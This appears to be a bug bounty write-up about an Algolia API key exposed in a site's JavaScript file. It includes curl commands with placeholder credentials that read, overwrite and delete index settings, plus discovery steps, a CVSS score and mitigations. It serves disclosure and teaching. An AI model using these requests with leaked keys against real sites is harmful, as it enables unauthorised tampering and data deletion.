API Misconfiguration - Algolia API Key
Summary
CRUD stands for Create, Read, Update, and Delete which are the four basic operations that are performed on data stored in a database. When building an API, these CRUD operations are often used for creating a basic interface for interacting with a database to perform these operations. These CRUD operations form the basic building blocks for interacting with a database through an API and are used to create, read, update and delete data as needed. The implementation of these operations can vary depending on the specific requirements of an application but the basic concept remains the same.
- Create: This operation is used to create a new record in the database. The API accepts the data as an input, usually in JSON format and then inserts this data into the database as a new record.
- Read: This operation is used to retrieve data from the database. The API accepts a query, such as the ID of a specific record and then returns the data for that record to the user.
- Update: This operation is used to modify an existing record in the database. The API accepts the data as an input, usually in JSON format and then updates the corresponding record in the database with the new data.
- Delete: This operation is used to delete a record from the database. The API accepts a query, such as the ID of a specific record and then deletes the corresponding record from the database.
Description
We have identified an API misconfiguration of Algolia API Key on one of the program of YesWeHack for which we were awarded 500 Euros. We found all the three things required to exploit the Algolia API key which are Algolia API Key, Algolia Application ID, Algolia Index Name and all the three things were being disclosed in the .js file. We took the exploit from Github Keyhacks and used it with the API key.
Here are the corresponding HTTP verbs for each operation:
- Create: HTTP POST
- Read: HTTP GET
- Update: HTTP PUT or HTTP PATCH
- Delete: HTTP DELETE
HTTP POST is used to create a new resource on the server. The request payload typically contains the data to be stored.
Example
curl -X POST --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header ‘content-type: application/json’ --header ‘x-algolia-api-key: <example-key>’ --header ‘x-algolia-application-id: <example-application-id>’ --data ‘{“highlightPreTag”: “This is hacked”}’
HTTP GET is used to retrieve/read the data of a resource from the server. The response payload typically contains the data that represents the resource.
Example
curl --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header ‘content-type: application/json’ --header ‘x-algolia-api-key: <example-key>’ --header ‘x-algolia-application-id: <example-application-id>’
HTTP PUT is used to replace the entire data of a resource on the server with a new one. The request payload typically contains the new data to replace the old data.
Example
curl -X PUT --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header ‘content-type: application/json’ --header ‘x-algolia-api-key: <example-key>’ --header ‘x-algolia-application-id: <example-application-id>’ --data ‘{“highlightPreTag”: “This is hacked”}’
HTTP PATCH is used to partially update a resource on the server. The request payload typically contains only the changes that need to be made to the existing data.
Example
curl -X PATCH --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header ‘content-type: application/json’ --header ‘x-algolia-api-key: <example-key>’ --header ‘x-algolia-application-id: <example-application-id>’ --data ‘{“highlightPreTag”: “This is hacked”}’
HTTP DELETE is used to remove a resource from the server. The request payload is usually empty, as the server will simply remove the resource identified by the URL.
Example
curl -X DELETE --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings --header ‘content-type: application/json’ --header ‘x-algolia-api-key: <example-key>’ --header ‘x-algolia-application-id: <example-application-id>’ --data ‘{“highlightPreTag”: “This is hacked”}’
Exploit Code using Curl Command:
https://github.com/streaak/keyhacks#Algolia-API-key
How we found this vulnerability ?
- We found a path to .js file in source code and then we searched for the API key in a .js file
2. We used the curl command to check the basic misconfiguration of the Algolia API Key (Update Operation)
3. Then using burpsuite, we visited the URL shown in the exploit of Algolia API key and checked the response
4. We opened the response in browser
5. We performed the read operation to read different indexes
NOTE: Delete operation was also possible but after discussing with the company it was not allowed to perform a DELETE operation.
Why this happened ?
In my opinion,
It happened because of the three main flaws
- Client Side API Storage
The application was storing the API key and its data on the client side.
2. Improper Authorization
The application did not had proper authorization check against the API calls being made.
3. Insecure API endpoints
The sensitive API endpoints were accessible to all users.
Impact
Any user will be able to create, read, update and delete the things on the website. An attacker can add his/her own content on the website and can delete the available content of the website.
Calculated CVSS
Vector String : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Score : 9.8 (Critical)
Mitigation
There are three things that needs to be implemented to mitigate this issue which are
- Implementing proper authentication and authorization mechanisms to ensure that only authorized users can perform CRUD operations
- Do not store API keys and secrets on the client side
- Keep your API up-to-date with the latest security patches and updates to prevent known vulnerabilities and exploits
Collaboration done with:
